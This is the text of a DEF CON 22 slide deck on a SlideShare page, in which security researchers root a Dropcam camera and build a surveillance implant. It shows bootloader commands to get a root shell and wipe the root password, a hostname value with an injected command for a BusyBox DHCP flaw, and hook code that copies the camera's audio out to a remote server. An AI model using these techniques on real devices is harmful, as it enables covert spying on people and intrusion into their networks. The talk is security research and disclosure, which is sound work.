SlideShare a Scribd company logo

Defcon 22-colby-moore-patrick-wardle-synack-drop cam

Priyanka Aash
Priyanka Aash

Defcon 22-colby-moore-patrick-wardle-synack-drop cam

Technology
1 of 49
www.synack.com @colbymoore @patrickwardle
optical surgery; implanting a dropcam colby moore / patrick wardle
Synack Colby Moore (vrl/synack) Patrick Wardle (nasa/nsa/vrl/synack) Synack’s R&D team who we are
> an outline overview root access vulnerabilities implant
an overview what/why?
“Dropcam is a cloud-based Wi-Fi video monitoring service with free live streaming, two-way talk and remote viewing that makes it easy to stay connected with places, people and pets, no matter where you are.” (dropcam.com) cloud recording night vision two-way talk intelligent alerts
> setup or
> a target got a target on your back?! extremely popular found in interesting locations useful capabilities
rooting a dropcam popping one of these #
> probing some portz exposed 3.3v UART breakout board (FTDI serial to USB) serial connection (pin 3 & 4)
> and action! password prompt $ screen /dev/tty.usbserial-A603NJ6C 115200 [0.000000] Linux version 2.6.38.8 (dropcambuild@linux-ws) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) ) [0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f [0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache ! ... ! ! ! .:^:. .o0WMMMMMNOc. lk, dWMMMMNXNMMMMWl .NMc dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd. KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX .0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX :XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK ;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;. 'ONx' .WM: .. ! Ambarella login:
> accessing the bootloader bootloader $ screen /dev/tty.usbserial-A603NJ6C 115200 ! ___ ___ _________ _ / _ | / || ___ | | / /_ | . . || |_/ / ___ ___ | |_ | _ || |/| || ___ / _ / _ | __| | | | || | | || |_/ /| (_) || (_) || |_ _| |_/_| |_/____/ ___/ ___/ __| ---------------------------------------------------------- Amboot(R) Ambarella(R) Copyright (C) 2004-2007 ... amboot> power on hit ‘enter’
> booting in a root shell set boot parameters to /bin/sh amboot> help The following commands are supported: help bios diag dump erase exec ping r8 r16 r32 reboot reset setenv show usbdl w8 w16 w32 bapi amboot> help setenv Usage: setenv [param] [val] sn - Serial number auto_boot - Automatic boot cmdline - Boot parameters auto_dl - Automatically try to boot over network tftpd - TFTP server address ... ! amboot>setenv cmdline DCSEC console=ttyS0 ubi.mtd=bak root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh ! amboot>reboot bootloader’s help bootloader’s setenv command
> nop’ing out r00t’s password reset boot params # ls -l /etc/shadow /etc/shadow -> /mnt/dropcam/shadow ! # more /etc/fstab # /etc/fstab: static file system information. # # <file system> <mount pt> <type> # /dev/root / ext2 … # NFS configuration for ttyS0 /dev/mtdblock9 /mnt/dropcam jffs2 ! # mount -tjffs2 /dev/mtdblock9 /mnt/dropcam # vi /etc/shadow root:$1$Sf9tWhv6$HCsGEUpFvigVcL7aV4V2t.:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: ! # more /etc/shadow root::10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: ! reboot root :)
vulnerabilities ….
> the environment #uname -a Linux Ambarella 2.6.38.8 #80 PREEMPT Aug 2013 armv6l GNU/Linux ! # ps aux | grep connect 821 root 0:10 /usr/bin/connect 823 root 0:13 /usr/bin/connect 824 root 0:00 /usr/bin/connect linux (arm 32-bit) …and dropcam specific binaries
> decently secure no open ports all communications secured unique provisioning
> heartbleed (client side) # openssl version OpenSSL 1.0.1e 11 Feb 2013 openssl version yah,%this%is%vulnerable
> heartbleed (client side)
> busybox (cve-2011-2716) busybox: “is a multi-call binary that combines many common Unix utilities into a single executable” malicious%DHCP%server //unpatched%version
 case%OPTION_STRING:
 % memcpy(dest,%option,%len);
 % dest[len]%=%'0';
 %%%return%ret;% ;process%OPTION_STRING/OPTION_STRING_HOST% MOV%%%%R0,%R4%%%%%%%%%%% MOV%%%%R1,%R5%%%%%%%%%%% MOV%%%%R2,%R7%%%%%%%%%%% BL%%%%%memcpy%% % ;memcpy(dest,%option,%len)%% MOV%%%%R3,%#0% STRB%%%R3,%[R4,R7]%;dest[len]%=%'0';
 “host.com;evil%cmd” cve-2011-2716: “scripts (may) assume that hostname is trusted, which may lead to code execution when hostname is specially crafted” dropcam disassembly
> ‘direct usb’ power on no%need%to%open%device!
> OS X privilege escalation $ ls -lart /Volumes/Dropcam Pro/Setup Dropcam (Macintosh).app/Contents/MacOS/ ! -rwxrwxrwx 1 patrick staff 103936 Aug 12 2013 Setup Dropcam (Macintosh) drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 .. drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 . app%binary%is%world%writable! non-priv’d attacker on host infected dropcam app r00t == yes
cuckoo’s egg a dropcam implant
> the implant should… see hear infect command shell locate infil/exfil survey
> conceptually corporate network “He sees you when you're sleeping He knows when you're awake He knows if you've been bad or good” (like the NSA? j/k)
> finding the “brain” how does the dropcam, hear, see, and think? where is the brain?!
> the connect binary the /usr/bin/connect binary is a monolithic program that largely contains the dropcam specific logic.
> but it’s non-standardly packed…. $ hexdump -C dropCam/fileSystem/usr/bin/connect ! 00000000 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 |.ELF............| 00000010 02 00 28 00 01 00 00 00 a0 f5 06 00 34 00 00 00 |..(.........4...| 00000020 74 81 06 00 02 02 00 05 34 00 20 00 02 00 28 00 |t.......4. ...(.| 00000030 03 00 02 00 01 00 00 00 00 00 00 00 00 80 00 00 |................| 00000040 00 80 00 00 8c 7e 06 00 8c 7e 06 00 05 00 00 00 |.....~...~......| 00000050 00 80 00 00 01 00 00 00 90 5a 00 00 90 5a 14 00 |.........Z...Z..| 00000060 90 5a 14 00 00 00 00 00 00 00 00 00 06 00 00 00 |.Z..............| 00000070 00 80 00 00 7f d2 62 0c 55 50 58 21 04 09 0d 17 |......b.UPX!....| $ upx -d dropCam/fileSystem/usr/bin/connect Ultimate Packer for eXecutables ! UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 ! File size Ratio Format Name -------------------- ------ ----------- ----------- upx: connect: IOException: bad write ! Unpacked 1 file: 0 ok, 1 error. upx’d unpack error :/
> packed connect packer stub was identified as NRV2E and identically matched source (armv4_n2e_d8.S) ! -> the stub was not modified/customized //elf%unpack%function
 void%PackLinuxElf32::unpack(OutputFile%*fo)
 {
 % ...
 
 %%%bool%const%is_shlib%=%(ehdrc>e_shoff!=0);% % //this%code%path%taken
 % if(is_shlib)
 % {
 % % % //exception%is%thrown%here upx%src;%p_lx_elf.cpp //elf%unpack%function
 #define%EI_NIDENT%16% typedef%struct%{
 % Elf_Char% e_ident[EI_NIDENT];
 % Elf32_Half%e_type;
 % Elf32_Half%e_machine;
 % Elf32_Word%e_version;
 % Elf32_Addr%e_entry;
 % Elf32_Off%e_phoff;
 % Elf32_Off%e_shoff;
 %%%%…
 }%Elf32_Ehdr;
> generically unpacking connect connect is not a shared library …why is is_shlib true (due to e_shoff != 0)? //unset%ehdrc>e_shoff
 with%open(fileName,%'rb')%as%packedFile
 % fileBytez%=%list(packedFile.read())
 
 % #zero%out%ehdrc>e_shoff
 % fileBytez[SH_OFFSET:SH_OFFSET+SH_SIZE]%=%[0]*SH_SIZE $ python dropWham.py connect -unpack [+] unsetting ehdr->e_shoff [+] invoking UPX to unpack Ultimate Packer for eXecutables File size Ratio Format Name -------------------- ------ ----------- ----------- 890244 <- 426577 47.92% linux/armel connect Unpacked 1 file. ! 
 $ strings connect Dropcam Connect - Version: %d, Build: %d (%s, %s, %s) jenkins-connect-release-node=linux-144, origin/release/grains_of_paradise CONNECT_BUILD_INFO CONNECT_PLATFORM CONNECT_VERSION nexus.dropcam.com ... can use for evilz?!
> the persistent core easy portable modules # du -sh 34.6M ! # less /etc/init.d/S40myservices ... tar -xvf python2.7-stripped.tgz -C /tmp/
 /tmp/bin/python2.7 /implant/cuckoo.py & ! cuckoo’s nest…something not enough space for python persist as init.d script- decompress custom python …and action!
> networking C&C # netstat -t Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 1144 192.168.0.2:40978 ec2-54-196-21-142.compute-1.amazonaws.com:https ESTABLISHED tcp 0 1337 192.168.0.2:41988 ec2-54-196-21-130.compute-1.amazonaws.com:https ESTABLISHED which is legit? ;) command and control channel streaming channel dropcam/cuckoo’s egg connections
> geolocation ? {iwlist-wlan0-scan} googleapis.com/geolocation/v1/geolocate?
> host infection
> host infection this is the (implanted) device! renamed (original) binary OS X kindly hides app details
> host infection (OS X) XProtect Gatekeeper OSX Sandbox Code Signing he wins! <
> audio and video /usr/bin/connect kernel mode conceptually more specifically
> injection the connect binary exclusively opens both the audio card # arecord arecord: audio open error ! Device or resource busy connect’s-process space kernel mode injected module # LD_PRELOAD=./injectMe.so /usr/bin/connect module injection no sharing
> hooking //blah
 int%main()
 {% % //do%something
 % result%=%someFunction();% % printf(“result:%%#xn”,%result);% } //blah
 int%someFunction()
 {% % //do%something% % return%someInt;
 } //blah
 int%someFunction()
 {% % //do%something%EVIL% % return%someInt;
 } }same name & declaration
> grabbing audio dropcam uses the Advanced Linux Sound Architecture (ALSA) for audio //blah
 LDR%%%%%R2,%[R11,#size]
 LDR%%%%%R0,%[R5,#0xFC]
 SUB%%%%%R1,%R11,%#cptrptrBuffer
 BL%%%%%%snd_pcm_readn% % ;read%audio!
 CMP%%%%%R0,%R2
 BEQ%%%%%readOK
 ...
 LDR%%%%%R1,%"read%from%audio%interface%failed"
 MOV%%%%%R0,%R4%%%%%%%%%%% % ;=stderr
 BL%%%%%%fprintf finally some disasm ;) get some audio snd_pcm_sframes_t%snd_pcm_readn(
 % % % snd_pcm_t*%pcm,%
 % % % void%**bufs,%
 % % % snd_pcm_uframes_t%size) “Read non interleaved frames to a PCM”
> programmatically hooking audio //replaces%snd_pcm_readn
 //%c>captures%dropcam’s%audiosnd_pcm_sframes_t%snd_pcm_readn(snd_pcm_t%*pcm,%void%**bufs,%snd_pcm_uframes_t%size)
 {
 %%
 %%//function%pointer%for%real%snd_pcm_readn()
 %%static%snd_pcm_sframes_t%(*orig_snd_pcm_readn)(snd_pcm_t*,%void**,%snd_pcm_uframes_t)%=%NULL;
 
 %%//frames%read
 %%snd_pcm_sframes_t%%framesRead%=%0;
 
 %%//get%original%function%pointer%for%snd_pcm_readn()
 %%if(NULL%==%orig_snd_pcm_readn)
 % orig_snd_pcm_readn%=%(snd_pcm_sframes_t(*)(snd_pcm_t*,%void**,%snd_pcm_uframes_t))%=%dlsym(RTLD_NEXT,%"snd_pcm_readn");% 
 
 %%//invoke%original%snd_pcm_readn()
 %%framesRead%=%orig_snd_pcm_readn(pcm,%bufs,%size);
 
 %%//exfil%captured%audio
 %%if(framesRead%>%0)
 %%% sendToServer(AUDIO_SERVER,%AUDIO_SERVER_PORT,%bufs,%size);
 
 %%return%framesRead;
 
 } injected into connect process
> grabbing video dropcam talks to a propriety Ambarrella kernel module to access the h.264 encoded video stream :/ //blah
 LDR%%%%%R0,%"/dev/iav"
 MOV%%%%%R1,%#2%%%%%%%%%%;%oflag
 MOV%%%%%R2,%#0
 BL%%%%%%open send ioctl to video driver open video device //blah
 MOV%%%%%R0,%R5%%%%%%%%%%
 LDR%%%%%R1,%=0x40046540%% ;%ioctl
 MOV%%%%%R2,%#0xD
 BL%%%%%%ioctl
 CMP%%%%%R0,%#0
 LDRLT%%%R0,%"IAV_IOC_START_ENCODE_EX"
 BLT%%%%%printError undocumented struct :/ //blah
 MOV%%%%%R3,%#1
 MOV%%%%%R0,%R5%%%%%%%%%%;%fd
 LDR%%%%%R1,%=0x80046537%;%request
 ADD%%%%%R2,%SP,%#0x120+var_D8
 STRB%%%%R3,%[R8]
 BL%%%%%%ioctl
 CMP%%%%%R0,%#0
 LDRLT%%%R0,%=aIav_ioc_read_b%;%"IAV_IOC_READ_BITSTREAM_EX"
 BLT%%%%%printError
> grabbing video open the /dev/iav device map BSB memory via IAV_IOC_MAP_BSB ioctl map DSP memory via IAV_IOC_MAP_DSP ioctl get the streams state via IAV_IOC_GET_ENCODE_STREAM_INFO_EX ioctl then check that its IAV_STREAM_STATE_ENCODING finally, read the stream via the IAV_IOC_READ_BITSTREAM_EX ioctl get the h.264 parameters via IAV_IOC_GET_H264_CONFIG_EX ioctl
> manipulating video (conceptually) connect’s-process spaceinjected module
> manipulating video (example) size and pointer to frame allows the malicious code to swap out frames on the fly….or just replay one(s) to loop the video stream! IAV_IOC_READ_BITSTREAM_EX-ioctl
> cuckoo’s egg C&C server
> cuckoo’s egg C&C server status/result command data
> questions/answers @colbymoore
 @patrickwardle colby@synack.com
 patrick@synack.com
> creditz images: dropcam.com 
 icons: iconmonstr.com flaticon.com

Recommended

Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomPriyanka Aash
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 

Recommended

Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacDefcon 22-paul-mcmillan-attacking-the-iot-using-timing-attac
Defcon 22-paul-mcmillan-attacking-the-iot-using-timing-attacPriyanka Aash
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomPriyanka Aash
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
How Safe is your Link ?
How Safe is your Link ?How Safe is your Link ?
How Safe is your Link ?Peter Hlavaty
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
Audit
AuditAudit
AuditMark Ellzey Thomas
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with DroidsPeter Hlavaty
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
Guardians of your CODE
Guardians of your CODEGuardians of your CODE
Guardians of your CODEPeter Hlavaty
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Back to the CORE
Back to the COREBack to the CORE
Back to the COREPeter Hlavaty
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the CorePeter Hlavaty
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashinfodox
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments Eueung Mulyana
 

More Related Content

What's hot

Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Power of linked list
Power of linked listPower of linked list
Power of linked listPeter Hlavaty
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Guardians of your CODE
Guardians of your CODEGuardians of your CODE
Guardians of your CODEPeter Hlavaty
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoShakacon
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion TechniquesJason Lang
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazyMichael Boman
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashinfodox
 

What's hot (20)

Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Power of linked list
Power of linked listPower of linked list
Power of linked list
 
Audit
AuditAudit
Audit
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Racing with Droids
Racing with DroidsRacing with Droids
Racing with Droids
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 
Guardians of your CODE
Guardians of your CODEGuardians of your CODE
Guardians of your CODE
 
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin VigoBreaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
Breaking Vaults - Stealing Lastpass Protected Secrets by Martin Vigo
 
Modern Evasion Techniques
Modern Evasion TechniquesModern Evasion Techniques
Modern Evasion Techniques
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
 
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trash
 

Similar to Defcon 22-colby-moore-patrick-wardle-synack-drop cam

04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments ONOS SDN Controller - Clustering Tests & Experiments
ONOS SDN Controller - Clustering Tests & Experiments Eueung Mulyana
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...tutorialsruby
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionlinuxlab_conf
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
Crash Dump Analysis 101
Crash Dump Analysis 101Crash Dump Analysis 101
Crash Dump Analysis 101John Howard
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersDevDay Dresden
 
Slackware Demystified [SELF 2011]
Slackware Demystified [SELF 2011]Slackware Demystified [SELF 2011]
Slackware Demystified [SELF 2011]Vincent Batts
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers ToolboxStefan
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisPositive Hack Days
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptxssuserfcf43f
 
Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Day Melbourne - Troubleshooting Ceph
Ceph Day Melbourne - Troubleshooting Ceph Ceph Community
 

